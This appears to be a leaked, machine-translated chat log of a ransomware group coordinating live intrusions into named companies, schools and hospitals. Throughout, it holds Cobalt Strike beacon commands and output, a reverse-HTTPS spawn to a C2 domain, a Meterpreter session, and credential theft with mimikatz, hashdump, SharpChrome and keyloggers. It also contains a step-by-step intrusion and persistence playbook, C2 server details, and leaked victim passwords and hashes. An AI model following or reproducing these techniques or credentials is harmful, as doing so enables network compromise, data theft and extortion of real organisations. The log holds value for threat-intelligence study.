dunno, in sisd dll blocked and psh work out. if the psh load was fud why would we all dll update? and a follow up question, so let your colleagues tell me about coba load in psh format) i'm already getting tired of repeating. powershell beacon what load? load, there is nothing but windef, and notifications pop up. what is windef blocking? is windef blocking dll, wind is blocking winschel, cmd is disabled by admin. if you're not sure if windef is blocking: windef is blocking dll, cmd is disabled by admin. I take. locham is not just using dll, just saying, the coba load in psh format has been stolen and not cleaned and everything through verashell session to the coba. why download something and it can download files? it will not be easier to download a file? so why do you need to download a file in coba in a minute through psh and start downloading it in coba, or you can immediately prepare a file in tpsh. zagi look what if it is empty now? tsepvpvrzablitet 3 pieces: https://ra.vdi.stevens.edu/vpn/index.html https://remote.egr.msu.edu/rdweb/pages/en-us/login.aspx https://tcph.stg-healthcare.com/rdweb/pages/en-us/login.aspx I think all 3 are free? Let's move on. ACADEMIC.NET no? Took LA\DA\EA off, hell.
I got the system up, but I can't send it to the cobu (80, 8080 ports with http listener) and I opened the 443 port and no session will come in. History of my migration between domains: I opened a session with the rights `System`, opened the list of processes and logged in to the administrator, took a list of hosts on the other domain and through the command `shell dir \\[ip]\C$\Users` tried to determine where authorized was the DA, seeing that the list of directories is and filled dll through wmic run, at first (Friday) process runs but session did not come, today I tried again with re-crypted dll and session came, but then as usual hashdump + mimic and try to jump on the DC, all end, go away `SDFJ*H97yW*EFG7ysaEy9F*&sg8$ef84` update tulchanok, then work out. so now all? 1 wait for us all came? i only change the names, logins will remain the old names. i think this moment has come. Yes. what was it? port? and the network is also user3. me - ttps://lab.devry.edu/vpn/index.html my network is still up and running.
user3 mine is ttps://lab.devry.edu/vpn/index.html user9 more concrete. Now we have 3 networks in operation with sisd.k12 but sisd.net, not counting avers, everything seems ready. Try new creds. Determine first what's done, what's planned. What's the plan? hello. Hi there :space_invader: no problems. we should have at least some feedback on the nets, what's closed, that not to have such situations, provided that now we know that for closed grids go bonuses. for 2 grids, I remember it )))) we had a few prizes after training and before january one, when asked what the bonus - "for good mood". I think I said that one such was. I was told that you had a bonus for closed grids + second. @tl1 add me please `sccy.com`. without fuck-ups. so let's fuck up the quality, in the end we'll all be on the plus side, so we do from 1 time we do nothing( not the fact that there was no offline backups, all rolled back. And if finished with the 2nd time? all the ones that didn't get up, how many of them did, by the way? let's just say successfully = no network, completely paralyzed. the question of the prizes until today will be decided today. now more motivated. today I personally vouch for the prizes on successfully closed networks, draw a line. The answer is always the same! What I was given out I handed out. the question to him, you are there amateur activity about which no one knows but you) the Offices got it, we'll be more vigilant and make more effort, I hope our efforts will not go unnoticed. or wait, I got 2 or 3 thousand that month more than others, but I spent at work and gasoline for 4) who promised?
Let's say they promised me a prize for the forum, I fucked 3 days off doing the forum. i got nothing. when there should be at least 2, let's say even 1. so is 1 prize a reason to say that they have? about bonuses the question is open. i also remember it, but @user3 maybe not thim lidovna. but you who did not congratulate?) the new year was not even congratulated before january. recently have not fucking closed if i'm right. probably will come to you now, specify about bonuses. or we fucking have not closed? Where are they? What bonuses? Seriously? This is the first time we've heard, I honestly don't understand. you get bonuses for successfully closed networks. don't you need them? hello there, what are we working on? good night. bz tomorrow by 4 more hours work. in #ballymoregroup-com turned off the VPN, I could not find it, other machines could not get on. then helped in #sccy-com jumped on the cars, where they sit guys who in theory go to the nasa - deaf, the creeds from them in search. of the deleted 50 normal? if your coba did not delete them usually 300 +. what slipshod? night files clean up to tomorrow in slipshod. tomorrow as usual. then finish for today. joined user1, throw me in the confab + I will help those who do not have sessions. help those who have. add me to him. write to the confa @tl1 HN.LOCAL Pomayu alexandru. ok no, still throw me a session in the slipstream, may have a file with authorization or with the creed, maybe lucky you. what do you mean by configs citrix? then you go out now looking for citrix configs. apparently yes. @tl1 i think the machine is not in the domain at all. + @tl1 i have a session hung up. i took myself INTUNETEST, the domain does not show, as i gather the info i will write you. .com those who do not have their networking confab write domains + will have something to work with if they fall off, if there are not taken - take away. +++ all taken? losalna write the domains to make the confa. yes, starta. I do not I do not I have no. immediately make yourself a spawn. wait I have
not + took one. secws2 so far. what 3 disassembled? yes. ok rephrase, where to turn off plugins? or do you mean cna modules? it turns out only 3 sessions. as an option disable all plugins and then turn on one by one, do not bother yet. @tl1 In others hang open where you can check it? although there has been a minute timeout. someone of you is a plugin that deletes "inactive" sessions. and where they disappear, where have they gone? Where have sessions left. create a confab when your session reaches the coba, check that arrives, if AV lab simply user1-9 without group binding * come in, choose a session, make a spawn in your coba, in the comment to the session of writing what user took. I do confab obshak? Where are the objects. while you have time to remember yesterday's material. @tl1 We have datacenter2 so on rdp and won't let you in... Reboot it or something. https://vmblog.ru/sbros-paroyal-root-v-vmware-esxi/ In general, I think that if the network does not collapse, it might be worth resetting passwords from the sphere on the esxi boxes. in crisper is not much, looking for esxi creds, they only go there via cc, passwords are not stored( also, it is possible that something started backing up in amazon backup, because there was an icon on the desktop of the admin. in general, checked his email, he writes part of the servers restored and some could not, went to a link from the note) And on some servers have put kaspersky anti-ransomware tool. what progress?
not today, rebound. @tl1 what about new sessions? DecryptPwd seems to yank from the path, if not confused look it up: putty HKCU\Software\SimonTatham\PuTTY\Sessions recursive search for *.ppk up to 3rd level in %USERPROFILE%\Documents %USERPROFILE%\.ssh %USERPROFILE%\Downloads HKCU\Software\SimonTatham\PuTTY\Sessions but 2 minutes. it doesn't retrieve passwords as far as i know, there's a psh script on git but it doesn't work. is there anything to get passwords or sessions from putty? except goferok. JR after 8 new sessions. came up, thanks a lot. but the builds are fresh on git. is there a latest version of mimic? while deaf shellcode. yes, come on. she> there is an article how on esx from sphere reset the root password. not in the loop, yes. by the way, ballymore are back. Ballymore have sessions. TL2 will be today? I wanted to ask him, maybe something washed up on the cessation of televisa? there's an article on how to reset the root password from the sphere, it may be worth a try? or the virtuals will fall down? there are sessions while i monitor the admin. have to search for esx. what are you doing? bigassfans.com user:lmmoore which ones are dead? can i get into wsndomain.com? both networks are dead. the rest are dead. no i have 1. how many networks with DA? how many or how many of each?
yes, mine is back, working with it. check the input cobu. i got 30. silencershop.com in the same groups. the rest of you who are working write down the progress. who wrote down the dead sessions in groups, wait 20 minutes. write in groups that need to be reopened. created. go to the site - d2l.com. yes. i think this is the real domain. desire2learn.com I just downloaded it, what is the real domain of the group? @tl1 ad_user_desireln.d2lvv taken. +1 free see? I can't see it, I've already created a confa.
>userPrincipalName: *davidw@dvdempire.lan
>objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=dvdempire,DC=lan
>dSCorePropagationData: 16010101000000.0Z
>lastLogonTimestamp: 132467236873201585
>textEncodedORAddress: X400:C=us;A= ;P=DVD Empire;O=Exchange;S=Walter;G=David;I=M;
*>mail: davidw@dvdempire.com
`dvdempire.lan` `dvdempire.com`
What is the real one? At the end of the fucking dvdempire.lan. mbh mobile user and works through wifi. Colleagues, I'm writing a note to the general channel! In the process of mstsc.exe I have not worked shell with the following error:
```
[-] Could not connect to pipe: 2
```
The right solution to this error was Inject to another process, namely rundll32.exe. Now I use the command line without knowing what to do!
rnvpna Not finding PO mzt. + there is one more available. @user7 your back `BEngeron@192.168.0.19 (LP-BC8DTT2)`. ifconfig did not show anything, now check cf. @user1 your back. Checking for signs of vpn? who died could come back. Check input coba. No connection. On the second `LDAP_BIND: [] Error 0x51 (81) - Server Down Terminating program.` Nothing comes up. net domain and AD find doesn't start. why? Mm-hmm. >mail: KMartin@snpartners.com >proxyAddresses: SMTP:KMartin@snpartners.com AD not removed probably. snpartners.com. what are the names of the fields? look - there are lots of emails on domains in users: https://www.snpartners.com/ https://www.martinsullivan.com/ https://www.snpartners.com/ they all have something to do with john deere. One FMP.local2 came. @user3 take it away there. +1 session new. where did you download the ad users? I downloaded there above - there names as autogenerated. take the ad users and watch it then. sure not av lab. 121 mb file on ad users - even in the terminal all do not fit into the terminal. what about ad?
20 min. Hung. There are 10 in progress. + do all groups have this address in their mail? I think so. E-mail: briancarroll@directmail.com This isn't porno. //www.bigassfans.com/ by powershell by the user either.
```
Name : Private Dashboard | Big Ass Fans
URL : https://bigassfans.myabsorb.com/#/dashboard
```
Real domain. and I'm creating a confab, hell info I didn't ask for it. Why? @user9 .local doesn't count. @user3 the main domain is real and I'll create a chat room - Austin.SilencerShop.com. Will you make groups that don't litter here? @tl1 thinks it's real. @user9 browser still check it out. Are there any trusts @user9?
seems normal, few machines and users 133/68
Trend Mycrots have one more free session available and check out the users
What's the axis? Because without AV? [+] Determining what EDR products are installed on localhost... [+] No EDR products found! Operate at your own risk! `````` beacon> psinject 13584 x86 Get-DomainUser -Server 10.50.212.45 | out-file -filepath "C:\ProgramData\ad_users.txt" [*] Tasked beacon to psinject: Get-DomainUser -Server 10.50.212.45 | out-file -filepath "C:\ProgramData\ad_users.txt" into 13584 (x86) [+] host called home, sent: 125019 bytes [+] received output: ERROR: FindAll : Exception calling "FindAll" with "0" argument(s): "The server is not operational.
ERROR: " ERROR: ERROR: At line:5253 char:52 ERROR: + else { $Results = $UserSearcher.FindAll <<<< () } ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException ERROR: + FullyQualifiedErrorId : DotNetMethodException ERROR: ``The ad_users in the mail address will be the real domain, if it will be .local then most likely something is wrong, check processes first, browser, ad infochet names are strange...``
try to take off through the shell didn't create through run just displayed a list of name+group through the shell did not work with the same error is it an external domain? try to run adfind.exe directly without ``button beacon> run AdFind.bat [*] Tasked beacon to run: AdFind.bat [+] host called home, sent: 347720 bytes [-] could not spawn AdFind.bat: 5 ``within run?
beacon> shell AdFind.bat [*] Tasked beacon to run: AdFind.bat [+] host called home, sent: 41 bytes [-] could not spawn C:\WINDOWS\system32\cmd.exe /C AdFind.bat: 5 beacon> shell dir [*] Tasked beacon to run: dir [+] host called home, sent: 34 bytes [-] could not spawn C:\WINDOWS\system32\cmd.exe /C dir: 5 ``Not localreal domains plz'' usr2-2[LP-BC8DTT2]BEngeron/15956|2020Oct15 22:33:49> net domain [*] Tasked beacon to run net domain [+] host called home, sent: 257 bytes [+] received output: WOSupply.local ``Look at the aduser and tell me if it happens or not, but it seems to be a real session ``` beacon> net domain [*] Tasked beacon to run net domain [+] host called home, sent: 231 bytes [+] received output: BigAssFan.local ``or reality? is it a trickBigAssFan.local on the classic - get the session, write the domain here, create a confab and then as usual for nothing good, thank youmaximum you will look for profiles for the team server do not think tomorrow will throw the guide, it is as understandable tomorrow will be no questions questions? tomorrow you and I will deal with cob settings and other things, with servers today will solve the problem plan following ``` 104.194.11.160:41476 SISmByXnBD8YYmmWFNtumTJWsX8YQhO4O6VR ``` here come the sessions, separate the AV/Honey from the normal networks and work with them, the coba is clean, you can pass yourself from here or work in it, depends on the dirt your kobya already wrote about it so we were told to fuck up now, so less you fuck up later because you busy@user7 about the coba later this is familiar ?I'm not asking how you infect the victim, I'm asking how you crypt the cob and stuff like session distribution between the teams how do you prepare the cob ?well, here's how you get the sessions ? @tl2 and silence, thank you at least for such answers (ok, then how to configure ? 
setup - please if you do not know where to get servers I will not tell here@user8 already wrote himself think about it and ask us first we want an answer to this question, where and how can you tell us ? first thing: take servers where will? what, how and why do we know the order of getting sessions on the cob 1. how to prepare a cobu 2. what to do 3. how to do it correctly 4. the principles of work to explain everything we need to bring it to us this allcoba need an algorithm for obtaining a new coba for each day with new configs, gaskets, servers clean after configurations? next after what? hmm. let's say, what next? or how to understand what I wrote? thank you all clear server registration, configuration of a web server with a domain and ssl which is sent to the server kobys hear hearPlease hear my cry from the soul !A to Z needs a complete scheme, not links to gita@tl1 @tl2 and about "spacers" in detail and the whole list of preparations setup cobo Explain in full the principle of getting cob@tl1 @tl2 Please take 10-15 minutes now, than to be distracted by our pings with stupid questions@tl1 @tl2 How to make sure the cobs arrive without pestering you with this? after 10 da@tl1 @tl2what about today's nets?:smirk: you will be the last one in any case) tell me if there are mistakes, otherwise it will not work and I will be the last one to blame! https://helpdocpt.club/threads/windows-%D0%A4%D0%BE%D1%80%D1%81-%D1%83%D0%B4%D0%B0%D0%BB%D1%91%D0%BD%D0%BD%D0%BE%D0%B3%D0%BE-%D0%BE%D0%B1%D0%BD%D0%BE%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F-%D0%B3%D1%80%D1%83%D0%BF%D0%BF%D0%BE%D0%B2%D1%8B%D1%85-%D0%BF%D0%BE%D0%BB%D0%B8%D1%82%D0%B8%D0%BA.43/ are there any linguists?
check https://helpdocpt.club/threads/%D0%9E%D1%82%D0%BA%D0%BB%D1%8E%D1%87%D0%B5%D0%BD%D0%B8%D0%B5-windows-defender-%D1%87%D0%B5%D1%80%D0%B5%D0%B7-%D0%B3%D1%80%D1%83%D0%BF%D0%BF%D0%BE%D0%B2%D1%8B%D0%B5-%D0%BF%D0%BE%D0%BB%D0%B8%D1%82%D0%B8%D0%BA%D0%B8.42/ well, if they are finished it is unlikely that there is something else to do there also mother-in-law lpe exploits translate the guide to disable vin def for forum nonstop check everything to have time to deal with the forum and additional modules neah (the old have not arrived? no (no sessions?) HelloHelloHi all if there are sessions - waitGood night)good night tomorrow by 3sessions in slip files deleted ok for today.yesTomorrow work? check your ballymore fell off or not. my offs worked for an hour)) #1-done-rtpcompany-com has a system so you can change the status of the result ok just access to rps apparently)and he is not LA and the first - current last time there was no funny thing, just ran SharpShares` `` [+] received output: Shares for 27L28: [--- Unreadable Shares ---] HP LaserJet Pro M404dn IPC$ [--- Listable Shares ---] ADMIN$ C$ print$ [+] received output: Shares for HENDSTORAGE: [--- Unreadable Shares ---] Gina(HP Color LaserJet CP3525) Gina(HP LaserJet 400 M401dne) HP MFP477 QA Lab IPC$ Matt(HP LaserJet 400 M401dne) Warehouse Office MFP(HP LaserJet 400 MFP M425dn) Warehouse Office(HP LaserJet 400 M401dne) [--- Listable Shares ---] ADMIN$ Apps C$ D$ Distro E$ GPO_Installs InstallApps ISOs Maint Office print$ Shared Users ``and select different groups do we have admin rights there? ``` \30L71.rtpco.local\ADMIN$ - Remote Admin \30L71.rtpco.local\C$ - Default share \30L71.rtpco.local/IPC$ - Remote IPC I understand it correctly, do I have to check 415 machines by name in ad_compacts now?
from different OU didn't understand it and I asked for respawnsession failed at one moment I've played with both dir and lhome from different groups either it gives nothing or access is denied 415there's jurl, username, password, click on the list, log in to the site, how do you get information from Lastpasa? how much access?? everywhereb access to the fs is denied and remot tula works, why is it vmic and even if even dir does not give vmic?dir only vmik checked? what does it say? Donald J. Trump (@realDonaldTrump) / Twitter - Mozilla Firefox ======= [control][ctrl] ``He also tweets it#ballymoregroup-com Found a VPN, took off my browser. the passwords from my browser to the VPN didn't work. Installed keylogger and since now on the screen lockscreen - there is a chance to catch a password. while looking in the files on the disk. SearchOutlook.exe not looking for shit. golden ticket done, found alive yes, check admin's comps (fs, ff) in #1-done-rtpcompany-com spawnas not working under any creeds, under the current polzakami took the balls off SharpShares: no listable shares besides print$ ShareFinder: where it says Remote Admin - it won't let me in in #waterway-com check passwords lastpass/logmein, except mharper'a I do not see anyone yet, at the same time watching the keyloggerBut no change, started looking for mozilla on computers where admins are pledged and check the password file from the keyloggerwrite what you have on progress not in that window) again some matyladno now look yyudshp who knows it)))) where it saves the log? no configurations...exactly there, i did not notice it in the toolchain saw the keylogger?
is there a third-party keylogger worthy of attention? if @user7 has something let him drain it there you seem to have everything there is a conf) `rawint.com ` no dotsink? well work if it flew to what edition of sofosag seems only sofos and winndef` `` 16464 972 LockApp.exe x64 1 BALLYMOREGROUP\rpearce 3988 748 SavService.exe 5184 748 SAVAdminService.exe 5372 748 ALsvc.exe ``whenever there is a hardwindefc, see what else on ps see the red processes``. [+] Determining what EDR products are installed on localhost... [+] host called home, sent: 57 bytes [+] savonaccess.sys Found [+] 1 EDR Products Found! ====================== | Vendor Information | ---------------------- [+] Sophos Found! ``I noticed that edr kvetch does not show all through edr + psst tell me what AV + because your coba was the cleanest show session put your shelkodblya, I had in the old one for some reason came ...-you do not fly? so not yet took silkodblya) and I do not fly by the classical 20 minutes put the scanners do not sleep as well by the way come silkods +- + preferably clean all koba have?+ + there are not even files AD in the confab, apparently a serious AB at the entrance to the baly recommend access to the VPN #ballymoregroup-com and here +1 together with @user7 + here one man # 1-done-rtpcompany-comobe already had two nets to work I, by the way, also seem to have gone stale I do not have clean kobe?add me in #evo-com:man_raising_hand: i'm in place:space_invader:hiprivWhat's the Mon by what time? 
Yeah, everyone yes, all:man_shrugging:a couple more restored to be sure in a long slip then lies:man_shrugging:then it should also reach the admin...the second as well knocks in the billd should reach if it goes first`` beacon> shell ping -n 1 asdasdasdsa.sadasdsadsa.kalarada.com [*] Tasked beacon to run: ping -n 1 asdasdasdsa.sadasdsadsa.kalarada.com [+] host called home, sent: 77 bytes [+] received output: Pinging asdasdasdsa.sadasdsadsa.kalarada.com [195.123.214.148] with 32 bytes of data: Reply from 195.123.214.148: bytes=32 time=131ms TTL=49 Ping statistics for 195.123.214.148: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 131ms, Maximum = 131ms, Average = 131ms `` hmm. the domain works...this is how to ping asdasdasdsa.sadasdsa.domain.com -n 1 I don't mean just check otherwise) `` beacon> shell ping -n 1 kalarada.com [*] Tasked beacon to run: ping -n 1 kalarada.com [+] host called home, sent: 53 bytes [+] received output: Pinging kalarada.com [195.123.214.148] with 32 bytes of data: Reply from 195.123.214.148: bytes=32 time=131ms TTL=49 Ping statistics for 195.123.214.148: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 131ms, Maximum = 131ms, Average = 131ms beacon> shell ping -n 1 www.kalarada.com [*] Tasked beacon to run: ping -n 1 www.kalarada.com [+] host called home, sent: 57 bytes [+] received output: Pinging www.kalarada.com [195.123.214.148] with 32 bytes of data: Reply from 195.123.214.148: bytes=32 time=133ms TTL=49 Ping statistics for 195.123.214.148: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 133ms, Maximum = 133ms, Average = 133ms I`m not sorry) test it) okay, do not touch the domains can not knock for other reasons if there are bots in the network on the backdoor admin - then the domains are alive directly from the car where you run) well, ping from where 
does not knock knew, but the fact that does not knock for 3 zakrepaty not know what?it means "it will" and if it gives out ipiniknado pinging level 3 domains it is very easy to check I only have 2) to check? or you do not have others? why? muncucfarfarisaa which ones are added?) I do not remember the other 2 domains have a mask ``` Adobe autoupdate#41162 1/22/2021 10:43:28 PM Running ``Let's change domains (there's no backups) there's one print server that's restored all the servers are important Why backups? ``` main.crispregional.org 10.1.0.22 https SYSTEM * CRHSBACKUP this is a new crispispisp version of the 10.1.1.22. if you want to copy and paste it into another crisp, it needs to be done before monday, i suggest we finish this today. 1. Gathering initial information about the domain and the environment - Full domain name - DCs list - LA\DA\EA - Password policy - PS - EDR - Systeminfo On the basis of this information we see what kind of network we are looking at: a workgroup with VPN, a lab, a work network. If you can't make a conclusion from step 1, go to step 2. 2. Collecting BP information - ADFind - ADFind trust If the total size of the files is more than 40mb, you need to put them into the archive. After analyzing the AD we make a conclusion about the network type. If it is a workgroup without a visible domain, we skip it and get the next network to work on. If a full-fledged network, move on 3. Gathering additional information about the domain and environment - Browser Dump - Seatbelt - kerberoast, asreproast - DuzzleUP - WinPEAS - Watson - GPP - ShareFinder - Check ZeroLogon all files in the process and logs you put in a folder with the name of the external network domain, under the names corresponding to the utilities you run. You pass the brute-force hashes to team lead 2 4. Additional actions. 
During ShareFinder run, we run persist on the entry point (ONLY IF YOU SUGGESTED IT) - generate a NEW build for EVERY run - hide dll in user folders (preferably appdata and as far away as possible) - run it, check if the dll is not deleted + staska appeared, write to me: hostname, startup rights all files are duplicated in the conf, as well as stored in a separate folder at your local location. Information about DC, LA, DA, EA, and all the passwords found in the process you put in a separate file creds.txt 5. If during or after the ShareFinder, as well as a quick brute-force hash, you get the opportunity to get out of the entry point, then by all means take advantage of it. Such a network gets priority and is not interrupted ``Yes, that's what I meant) thank you)``Good morning Maybe zerologon?:space_invader:NiGood night, it turns out? ok tomorrow a lot of work, maybe we will close from scratchChecked cpcc.edu no results. I have set up a vps, tomorrow I will bring everything up. I searched all over my surfboard and did not find any files and folders and just in case I had to roll out the os again.Pinged all that is pinged from the AD and scanned the balls on the pinged machines (in the conf. skipped). Coba and empire sessions don't go up. i have already got the ready kit and wanted to try it then psh empire`https://ucfapps.cloud.com/citrix/storeweb/`. it worked in it, the data does not get everything, no way to run the exe, in ptsh only managed to pull the server, and that with its own fuck ups, in the coba is not pulled, I think about how to separate further, tomorrow I will try something else? 2 vps configured completely according to the list 3 now in progress, here is the final stage, the empire is in conflict made a template guide on how to configure 1 wpc given to @user3 1 is ready to be given away 1 will soon be ready to be given upafter tomorrow I expect you at 12:00 a.m. 
in 12 minutes at homewrite me the result of your work todaytake it there msf and psh empirethank you I'll give you 3 debiannaw what do you likecaw@user8 you like lincus? got it this weekend they brought a new one, I will move to it, this began to often hang up another computer? I will now install another computerthere I @user7? @user9 got sick @user3 is late Where is everybody today? Not many of you...then I'll give you a new one. I don't know what to do with this grid. there was also `healthcare.com`, but there, according to your arguments, got burned (nothing ran, no google chrome, no kmd, no psh) in `unf.edu`, worked with it for a while and at one point the citrix credentials have changed, nothing yet? and now what about the tasks?[ ](https://mediaeveryone.com/channel/general?msg=Qdo9AtdEjZuyY5et4) you wrote that I have on my tasks kovyvayu asu.So what do you have on the tasks? and well)yes norms)well, how did you rest? inside ad infos, hashes, creds.txt etc ``` ``` And another thing, since the report will be an archive, next to the ad_*.txt files you make a file creds.txt in which DCs DA EA LA cleartext creds if there are any ``If there are any, delete it: ``` include(script_resource("modules/insleep.cna")); `````` popup beacon_bottom { menu "TW-toolkit"{ include(script_resource("modules/checkvm.cna")); include(script_resource("modules/clearev.cna")); include(script_resource("modules/FireWall.cna")); include(script_resource("modules/persistence.cna")); include(script_resource("modules/RDP.cna")); include(script_resource("modules/Win2012mimikatz.cna")); include(script_resource("modules/cmd.cna")); include(script_resource("modules/sleep.cna")); include(script_resource("rdpthief/RdpThief.cna")); include(script_resource("modules/collect.cna")); include(script_resource("modules/chrome.cna")); } } ``Only here or only here? Do you in the cobas also arrives? +, one left ... 
tense for the future, remove this plugin already removes sessions more than 1 minute asphyxiation just servak where YES for a long time or did not go at alla then seshchka offnut and all take a place on any server `` `` nitial beacon from SYSTEM *@192.168.1.7 (DC-01) ``Why the slip? go to the server 1 team yes, already working with him, the second has just configured, accesses are distributed there slip put while I sort the files is mineThose in the general cob?+while we can re-sort what we got and msf to configure)))) it's not even the server? no sessions left at all? + well bnpmedia.com exactly + all fell off? dom.helpathome.com so in the end, what is in work now? sort what we got earlier, then the rest are busy?only FRIVER.LOCAL is up and running now?[ ](https://mediaeveryone.com/channel/general?msg=vvBvMwABd6JENGyrv) what domain? FRIVER.LOCAL-+DIV420-4G350W2 (FRIVER.LOCAL)write down what online remained1minute+failed sessionTell me in sootvetstvennoy conf confine to throw allvatitoki write to confine from where hashine the fact kst that this local user no yuz all easierspawnas jump etc can be from other errors in the process check through net use `` AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct07 00:15:59> spawnas .\Administrator Shotgun913 https [*] Tasked beacon to spawn windows/beacon_https/reverse_https (regbest.com:443) as .\Administrator [+] host called home, sent: 261167 bytes [-] could not run C:\WINDOWS\system32\mstsc.exe as .\Administrator: 1326 Kernels look different so it's hashes) ah, I also uploaded kernels and there was also an admin who uploaded hash above...what to whom7 it's to whom? Administrator:500:aad3b435b51404eeaad3b435b51404ee:4108e652bab10290df6e95cbdf7edbf5:::Shotgun913 `````` [*] Dumping password hashes... 
``and then commands like this wdigest tspkg kerberos ssp livessp hashdump ``use mimikatz possible mimik to pullenum_utnand try to remove the module kobaThen the session does not fly in koboltot write while the results of the work in their confumb will be in the hash DAokey) now pour the case and continue to search) yes by the way did you graft the server?well, okay) there is a matter of taste)He mne like my brother, we are with him from the first version together)))) or something like thatArmitage -View - TableDon't make the default awful view in arma by defaultkstastatil shot out of turnsmith for smb_login from his computer, will die?if no more local connects you can continue to work operatively)already just a session on the vpc and disconnect it good for you that you have made a breakthroughperfectly make the connection that you have received to pull? on these vpc why? yes you and said that deployed msfnahera i gave vpc under msf? question i drink somethingDo you also pulled on your pc before that?kzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzznmDa through a proxy. We didn't do it any other way. Through armitage did but it needs a session Seriously on your pc pulled or what? I'm through a proxy bindomili real shot? on the VPS? And seriously? Definitely shot on his own pbut do not say that on his pc pulled through?) and for `` For?
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 185.150.190.204:2103) at 2020-10-06 23:07:43 +0300 ``I didn't look at it that way, but there are no strange groups))) thanks for the tip at least someone checked it) no have you checked it? but in ad users ivan has member_of strage_users and your user DOMAIN\ivan what you have in LA is written DOMAIN\strange_uesser I'm talking to the localgroup Administrators or do you analyze the groups and look for the current user in the list? )))))))) by DOMAIN\uesser how do you determine LA? ok if you find something I will throw here in an hour, only in brute force will go to nice to hear that) yes-I think the system will soon pass too, right?we don't have any LA inputs from the current live sessions?+I hope everyone heard and all made notes on this point understood, a little later with grandfather check citrixnothing on your pc you do not deploy, do not connect, do not establish a connection, for this you all issued you or very poorly documented, or lazy to look or ask guys stop it if you through yourself soks put, you can and msf sessions to pull on themselves, why vpc gave out rdp, browsers, etc. and i said that i should work on the network through vpc proxies why do we need a winDoc you had a question if you remember everything is ok, i did not hook up I wrote a long time ago you wanted a citrix proxy hook up made in coba do not say that you go from your pc to the network in foxecacom browsers and what proxies?I delete files immediately it's because of proxies that I prescribed in the browserAll he develops and chat))) well I read or understand it wrongWhy? He has a rocket chat hung up and he can not respond Well, how can he drop out of the chat and because of this in what question? What exactly he scans through a VPN? And how is it related? he scans for 17-10 mb that will fall out. and @user7 normal?
oh, that's the first one I spammed and he just hung up) Dak I dunno) I do not remember that there would be something to do) So I clarify the grid for @user7 and you help him, I just asked if you left the file or not) and @user7? and I worked there? I do not mind, but it hangs. file or left there? strange that you) someone is directly rushing to me))))) ``` 10/06 20:37:31 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 20:38:32 *** initial beacon from abinash.pattnayak@192.168.9.85 (ABINASHP)
``I understand that it didn't come back, help user7@user3 didn't get to YES? in process--didn't get up to systems yet? or yes? i say ok or no after startup, you can't start it1 startup and all one time my cob session + start working ``` dom.helpathome.com ``so this dampon did not say what, just said that he broke through svoitom how come back can you ask it? ``kiwi_cms'')) to the toilet where? he went out, do not ask (kiwi? svoitom what method? and all have tried his method?somewhere other than the grid @user3 were the rights systems? judging by the name of the polzak may well be LA@user3 can help so far others took the session but have not yet checked because the sessions are falling off - looking for a less stable processThis is not enough! there were promises that the fuck it will be no free @user9 @user1 how are you doing?
within an hour can come back as usual wait an hour there are 2 new sessions in the input cobaFailed skavot and do not see the vpn on and the pc is not in the domain at all how is the connection going to another name?how can I get a hellfind and still not find my machine?.immediately here is the name of the confabdisassembled in the coba came dead and new and then the questions, kerbs and other stuff is the scriptthe first message in the confab - DA, EA, LA, DC, ad infoDo yourself tutorial on "got the first session "What are you talking about?guys, honestly fucked repeating FIRST MESSAGE IN CONFECH SESSIONS back? in an hour will not arrive will be assigned to a couple on the current you from half an hour to an hour if it comes right away will notify let one of their monitors kobutozhe right, while waiting can help colleagues answer questions ok, while waiting bad (you said there was half a gig of information have you not archived?or there's a piece of AD info left there? what did you manage to remove? @user1 also wait mb will returndalf@user3 yours arrived? well, yes) so we took exactly the server segment and separated from it subsnets /24 /16subsnets not everything speaks the truth) but subsnets `>cn: 172.I have no trusts. is that normal? + now i will download everything and start 2? 3 people have not yet reported anything about dll launches?awaiting the groupbos ask yes@tl1 chetu.com i work feedback on dll, yes)give me a name, i will create a confab and give dlltoday i will definitely "live" network)who has a kilometer network, hands and head will not be redundantOkJdu if it does not come will work in parezhdy while you still 20 minutes it fell off do not see that he wrote it off here?I have noSession he hasWhat do you mean not distributed yet? 
Or yesterday's maybe now come catching in the first cobaSad means a lot of information)now maybe reopen 1 to 1 noThere will be sessions? the main thing is not too much noise the bigger the network the easier to work in it) fell off ska!@tl1 took away ad_users not yet worked out - is this a normal grid? @tl1Povisley((((``` [*] Finished Google Chrome extraction.
@user4 silence@user7 took the session 2 more? and then suddenly on the desktop....)in the conf conf, before running the dll, write down where you putDo you run through the shell rundll32 so with , comma exactly need? so, I give 1 dll in the conf, on 1 pc run. criteria: -hide it away in user folders (in %appdata%) a few levels deep and mask the name as synonymous with those where you put -Run it like this `rundll32 FULL_PATH_THE_DOLL\IMA.dll, entryPoint` -Check that it hasn't deleted -write in conf that you run and check the source file ``. execute-assembly /SharpChrome.exe logins /showall ``+looks like normal 4 two see Done Capture as user9 in the sweatshop has already said so fucking much + in the input cobbler only @user9 confirmed + waiting + in the input cobbler who has the network "checked" farther differently, one again cmd off, the second has 3 pc for analysis @user7 already 3 input sessions)Domain ad.happay.what on AD? beacon> execute-assembly /home/user/tools/ShWeb/SharpWeb.exe all [*] Tasked beacon to run .NET program: SharpWeb.exe all [+] host called home, sent: 705073 bytes [+] received output: === Chrome (Current User) === [+] received output: [X] Exception: The parameter is incorrect. === Checking for Firefox (Current User) === === Checking Windows Vaults === [-] Invoke_3 on EntryPoint failed. `````` beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpWeb.exe all [*] Tasked beacon to run .NET program: SharpWeb.exe all [+] host called home, sent: 705073 bytes [+] received output: === Chrome (Current User) === [X] Exception: The parameter is incorrect. === Checking for Firefox (Current User) === === Checking Windows Vaults === [-] Invoke_3 on EntryPoint failed. No rights in the conhost and swhost I can't get in.
